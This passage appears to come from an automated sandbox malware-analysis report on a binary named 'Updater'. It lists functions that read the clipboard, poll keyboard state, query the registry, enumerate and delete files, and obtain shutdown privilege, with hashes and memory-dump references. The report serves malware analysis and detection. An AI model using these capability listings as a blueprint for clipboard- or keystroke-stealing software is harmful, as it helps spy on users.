IsClipboardFormatAvailable.USER32(0000000D), ref: 00B9F69C
GetClipboardData.USER32(0000000D), ref: 00B9F6A8
CloseClipboard.USER32 ref: 00B9F6B4
GlobalLock.KERNEL32(00000000), ref: 00B9F6EC
CloseClipboard.USER32 ref: 00B9F6F6
GlobalUnlock.KERNEL32(00000000), ref: 00B9F721
IsClipboardFormatAvailable.USER32(00000001), ref: 00B9F72E
GetClipboardData.USER32(00000001), ref: 00B9F736
GlobalLock.KERNEL32(00000000), ref: 00B9F747
GlobalUnlock.KERNEL32(00000000), ref: 00B9F787
IsClipboardFormatAvailable.USER32(0000000F), ref: 00B9F79D
GetClipboardData.USER32(0000000F), ref: 00B9F7A9
GlobalLock.KERNEL32(00000000), ref: 00B9F7BA
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00B9F7DC
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B9F7F9
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B9F837
GlobalUnlock.KERNEL32(00000000), ref: 00B9F858
CountClipboardFormats.USER32 ref: 00B9F879
CloseClipboard.USER32 ref: 00B9F8C2

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 880de3792e09093b7297881da139372601f1832c84a7fe4f66b2bd178536e5ce
Instruction ID: dc8484ed20c0aabf2314faea342d593c72a79566352eea2d0b02872fec9c07a1
Opcode Fuzzy Hash: 880de3792e09093b7297881da139372601f1832c84a7fe4f66b2bd178536e5ce
Instruction Fuzzy Hash: 71618A352043029FD710EF24E888A7A7BE4EF84724F1449B9F45AC72A2EB75DD45CB62

Function 00B3D37F Relevance: 26.7, Strings: 17, Instructions: 5408COMMON

Download Yara Rule

Strings

\b(?<=\w), xrefs: 00B7CB3C
9, xrefs: 00B3D49A
], xrefs: 00B3D4F4
<, xrefs: 00B3D4A4
, xrefs: 00B3D4B8
:, xrefs: 00B3D472
!, xrefs: 00B3D47C
', xrefs: 00B3D4AE
+, xrefs: 00B3D45E
[:>:]], xrefs: 00B3DA92
DEFINE, xrefs: 00B7B15B
{, xrefs: 00B3D468
[:<:]], xrefs: 00B3DA7C
Q\E, xrefs: 00B7CB80
\b(?=\w), xrefs: 00B7CB35
", xrefs: 00B7C10D
0, xrefs: 00B3D490

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID: $!$"$'$+$0$9$:$<$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$]${
API String ID: 0-2815329305
Opcode ID: fa31f72f179805cea17f6adfbf8119512b155f3bfdb7cbe0c9196be9e38a114a
Instruction ID: 3f1331b35bd419cbd240ebd7680110cd6168d40e4a043c2615b461c3386fe830
Opcode Fuzzy Hash: fa31f72f179805cea17f6adfbf8119512b155f3bfdb7cbe0c9196be9e38a114a
Instruction Fuzzy Hash: 95A38075A00219DFDB24CF58D891BADB7F1FF48710F2581AAE969AB381E7709D81CB40

Function 00B9A187 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B9A1A8
GetFileAttributesW.KERNEL32(?), ref: 00B9A1E6
SetFileAttributesW.KERNEL32(?,?), ref: 00B9A200
FindNextFileW.KERNEL32(00000000,?), ref: 00B9A218
FindClose.KERNEL32(00000000), ref: 00B9A223
FindFirstFileW.KERNEL32(*.*,?), ref: 00B9A23F
SetCurrentDirectoryW.KERNEL32(?), ref: 00B9A28F
SetCurrentDirectoryW.KERNEL32(00BE79A0), ref: 00B9A2AD
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B9A2B7
FindClose.KERNEL32(00000000), ref: 00B9A2C4
FindClose.KERNEL32(00000000), ref: 00B9A2D6

Strings

*.*, xrefs: 00B9A23A

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 7e526d54af9b7ea884a83c1728a060b9ae112718a7f6d8a72c12ef6442335c4e
Instruction ID: 6051a4e47bb1f2af7178d1dc381338a313a967474026021d3dfc68916fb874f3
Opcode Fuzzy Hash: 7e526d54af9b7ea884a83c1728a060b9ae112718a7f6d8a72c12ef6442335c4e
Instruction Fuzzy Hash: 9431E0326002597FDF24AFA4EC49AEE77ECDF05320F1002E5E814E30A1FB75DA448AA5

Function 00B3CBF0 Relevance: 18.4, Strings: 14, Instructions: 876COMMON

Download Yara Rule

Strings

BSR_ANYCRLF), xrefs: 00B7A159
UCP), xrefs: 00B79F40
LIMIT_RECURSION=, xrefs: 00B7A03E
CR), xrefs: 00B7A0C0
UTF), xrefs: 00B79F2D
UTF16), xrefs: 00B79F02
NO_START_OPT), xrefs: 00B79F82
CRLF), xrefs: 00B7A0FA
LF), xrefs: 00B7A0DD
BSR_UNICODE), xrefs: 00B7A173
ANY), xrefs: 00B7A117
NO_AUTO_POSSESS), xrefs: 00B79F61
ANYCRLF), xrefs: 00B7A134
LIMIT_MATCH=, xrefs: 00B79FA3

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: f28b0aecd8a3a14e2abba60b4126e460f05f0045e01082dad4bfc9299d007da4
Instruction ID: 3a3a02d10c73c7bf2c4aedc312ab178f6e6bb749f313b516e4cfa2240a90a06e
Opcode Fuzzy Hash: f28b0aecd8a3a14e2abba60b4126e460f05f0045e01082dad4bfc9299d007da4
Instruction Fuzzy Hash: A3728171E002199BDB54CF59C8917AEB7F5EF84310F2481EAE819FB281EB709D85CB91

Function 00B98C58 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 189timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00B98D1A
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B98D2A
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B98D36
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B98DD3
SetCurrentDirectoryW.KERNEL32(?), ref: 00B98DE7
GetFileAttributesW.KERNEL32(?), ref: 00B98DF2
SetCurrentDirectoryW.KERNEL32(?), ref: 00B98E20
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B98E56
SetCurrentDirectoryW.KERNEL32(?), ref: 00B98E5F

Strings

*.*, xrefs: 00B98E65

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$AttributesSystem
String ID: *.*
API String ID: 2554310696-438819550
Opcode ID: 0c253cbb243bb752853848909242808e29091954dcc7ad1f4d70db68a211c34a
Instruction ID: fccdcf20ee632c3e5128bc21ce13979b043d13cfa8cb5ce3cf59266d2f13e2a5
Opcode Fuzzy Hash: 0c253cbb243bb752853848909242808e29091954dcc7ad1f4d70db68a211c34a
Instruction Fuzzy Hash: 57617D715042559FCB10EF20C8849AFB3E8FF89710F0449ADF989C7251EB35EA45CB62

Function 00B9A2E4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B9A305
FindNextFileW.KERNEL32(00000000,?), ref: 00B9A360
FindClose.KERNEL32(00000000), ref: 00B9A36B
FindFirstFileW.KERNEL32(*.*,?), ref: 00B9A387
SetCurrentDirectoryW.KERNEL32(?), ref: 00B9A3D7
SetCurrentDirectoryW.KERNEL32(00BE79A0), ref: 00B9A3F5
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B9A3FF
FindClose.KERNEL32(00000000), ref: 00B9A40C
FindClose.KERNEL32(00000000), ref: 00B9A41E

Part of subcall function 00B8E8E1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B8E8FC

Strings

*.*, xrefs: 00B9A382

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 872c08b9d200880d329ad39f8466f7058fee8226dce552e795156708d443dbdf
Instruction ID: 74abe440597308ba72c94bb2010685dab69f0238ac4e5bc7194ec684ddab86ec
Opcode Fuzzy Hash: 872c08b9d200880d329ad39f8466f7058fee8226dce552e795156708d443dbdf
Instruction Fuzzy Hash: 4B31033250465D7BDF20AFA4EC49ADE77ECDF05320F1001F5E814A32A1EBB4DE859A99

Function 00BAC844 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BAD398: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BAC0AE,?,?), ref: 00BAD3B5

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BAC93E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00BAC9A9
RegCloseKey.ADVAPI32(00000000), ref: 00BAC9CD
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00BACA2C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00BACAE7
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00BACB54
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00BACBE9
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00BACC3A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00BACCE3
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BACD82
RegCloseKey.ADVAPI32(00000000), ref: 00BACD8F

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3218304859-0
Opcode ID: 236f72a90c8045aabce499ee6fa3ec8dfabea6c0c1b0923a333e3294883202d5
Instruction ID: ac03691b37be8c491d9e7b60bc806df3b25145ea7e39c21e441b4b5076d6c3f3
Opcode Fuzzy Hash: 236f72a90c8045aabce499ee6fa3ec8dfabea6c0c1b0923a333e3294883202d5
Instruction Fuzzy Hash: 3B026371604200AFC714DF28C495E2ABBE5EF49314F5884ADF48ADF2A2DB35ED45CB51

Function 00B8AA95 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00B8AABD
GetAsyncKeyState.USER32(000000A0), ref: 00B8AB3E
GetKeyState.USER32(000000A0), ref: 00B8AB59
GetAsyncKeyState.USER32(000000A1), ref: 00B8AB73
GetKeyState.USER32(000000A1), ref: 00B8AB88
GetAsyncKeyState.USER32(00000011), ref: 00B8ABA0
GetKeyState.USER32(00000011), ref: 00B8ABB2
GetAsyncKeyState.USER32(00000012), ref: 00B8ABCA
GetKeyState.USER32(00000012), ref: 00B8ABDC
GetAsyncKeyState.USER32(0000005B), ref: 00B8ABF4
GetKeyState.USER32(0000005B), ref: 00B8AC06

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 7b91dac5fa079bf41a118ed7b75d4ffb7e5bfff1d041d32653881ebcbfde0fe2
Instruction ID: 2f7e93c6a7c1563340e15ca5ce1d256f8137389ae6e9029735f021bb24bcd1c7
Opcode Fuzzy Hash: 7b91dac5fa079bf41a118ed7b75d4ffb7e5bfff1d041d32653881ebcbfde0fe2
Instruction Fuzzy Hash: 3D41D8206047CA6EFF35676489447A5BEE1EB11304F0840DBD5C6475D1EBE499C4CB63

Function 00B97591 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 286timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B975BD
FindClose.KERNEL32(00000000), ref: 00B9760E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B9763A
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B97651

Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45

FileTimeToSystemTime.KERNEL32(?,?), ref: 00B97678

Strings

%02d, xrefs: 00B9774C, 00B97756, 00B977A4, 00B977F3, 00B97842, 00B97891
%4d%02d%02d%02d%02d%02d, xrefs: 00B976BE
%4d, xrefs: 00B976FE

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: FileTime$FindLocal$CloseFirstSystem_wcslen
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 409396820-2428617273
Opcode ID: c9c01659bf00721c56fe5094cb8a7b068352d57a2b656e4a53792f762fb952f6
Instruction ID: adb3f12801540a898821d098fff54cec19397beec5e03d027441189f994877a1
Opcode Fuzzy Hash: c9c01659bf00721c56fe5094cb8a7b068352d57a2b656e4a53792f762fb952f6
Instruction Fuzzy Hash: BFA15A72518254AFC710EFA4D885DAFB7ECEF84700F0049ADF589C6191EB34DA09CB62

Function 00B9F8D3 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00B9F8FA
EmptyClipboard.USER32 ref: 00B9F900
GlobalAlloc.KERNEL32(00000002,?), ref: 00B9F915
CloseClipboard.USER32 ref: 00B9FA0C

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 2c889fcb3877fd1e2b362c4bfe66e4ede54e7b3b9d97a8a8e20d075cb0636e92
Instruction ID: 4af4fd2d777c10fe86e465d94c4e8b5cac4ca5f1b1ab8686070dc8a04d7da0e4
Opcode Fuzzy Hash: 2c889fcb3877fd1e2b362c4bfe66e4ede54e7b3b9d97a8a8e20d075cb0636e92
Instruction Fuzzy Hash: 3141BE30205652AFDB10CF15E888F25BBE0EF45328F15C1A9E45ACB762DB79ED42CB90

Function 00B8E180 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2119F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B21192,?), ref: 00B211BF

GetFileAttributesW.KERNEL32(?), ref: 00B8E1C0
FindFirstFileW.KERNEL32(?,?), ref: 00B8E1FD
DeleteFileW.KERNEL32(?,?,?,?), ref: 00B8E24D
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B8E25E
FindClose.KERNEL32(00000000), ref: 00B8E275
FindClose.KERNEL32(00000000), ref: 00B8E27E

Strings

\*.*, xrefs: 00B8E1CF

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: d9b34bf45d5d2de4f61665f81b4481b878c5964f345c6a438393c43a44b1deab
Instruction ID: b9b1ee1fbf3ffab292425efbe2fa76ba72663f1ad293f7319af63a1a0956a513
Opcode Fuzzy Hash: d9b34bf45d5d2de4f61665f81b4481b878c5964f345c6a438393c43a44b1deab
Instruction Fuzzy Hash: 913161310083969FC705EF64D8958AFB7E8BE95310F404EBDF4E9921A1EB24DA09CB52

Function 00B8F76E Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00B827D9: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B82823
Part of subcall function 00B827D9: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B82850
Part of subcall function 00B827D9: GetLastError.KERNEL32 ref: 00B82860

ExitWindowsEx.USER32(?,00000000), ref: 00B8F7AA

Strings

, xrefs: 00B8F7D4
SeShutdownPrivilege, xrefs: 00B8F77A
, xrefs: 00B8F798
@, xrefs: 00B8F79D

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: b93b8f5c83602be6e10f63932a920c2b59b0f603bb67ecfa939785d29f06665f
Instruction ID: b51f5e4b33696fe82ed8e5e812408d97a14dd6378470c83f20bb837b9bad9118
Opcode Fuzzy Hash: b93b8f5c83602be6e10f63932a920c2b59b0f603bb67ecfa939785d29f06665f
Instruction Fuzzy Hash: 5501F27A651226ABF7243264AC89BBAB3DCD704750F5405B2FC02E31F2EA644C40C3A0

Function 00B5E32F Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00B5E475

Strings

1#INF, xrefs: 00B5F682
1#QNAN, xrefs: 00B5F67B
1#IND, xrefs: 00B5F66D
1#SNAN, xrefs: 00B5F674

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 65b0f60e195b137507acce911153b61abfeab884bc774494b967131515bd0347
Instruction ID: cb80f4cc53a063b0ec8509f55d116e758327dde4f60696d2851eb86fc0023729
Opcode Fuzzy Hash: 65b0f60e195b137507acce911153b61abfeab884bc774494b967131515bd0347
Instruction Fuzzy Hash: A9C24C71E046298FDB69CE28DD407EAB7F5EB48306F1441EAD85DE7240E774AE898F40

Function 00BA2E89 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00BA2E97

Part of subcall function 00B9F035: GetWindowRect.USER32(?,?), ref: 00B9F04D

GetDesktopWindow.USER32 ref: 00BA2EC1
GetWindowRect.USER32(00000000), ref: 00BA2EC8
mouse_event.USER32(00008001,?,?,?,?), ref: 00BA2EFA

Part of subcall function 00B8F7F5: Sleep.KERNEL32 ref: 00B8F86D

GetCursorPos.USER32(?), ref: 00BA2F26
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00BA2F84

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: c6b8f904717a5fea6695bf126b4933838bbbfc6c3ca5bedaade115b5b54afaa9
Instruction ID: a347efde4e59937b502c38136df63bd7bf12bb4689168c42e434105810c82669
Opcode Fuzzy Hash: c6b8f904717a5fea6695bf126b4933838bbbfc6c3ca5bedaade115b5b54afaa9
Instruction Fuzzy Hash: 5C31D472508306AFD720DF14D849FABB7E9FF89314F00091AF589A7191DB75E909CB92

Function 00B88056 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B880BE
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00B880F4
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00B88105
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B88187

Strings

DllGetClassObject, xrefs: 00B880FA

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
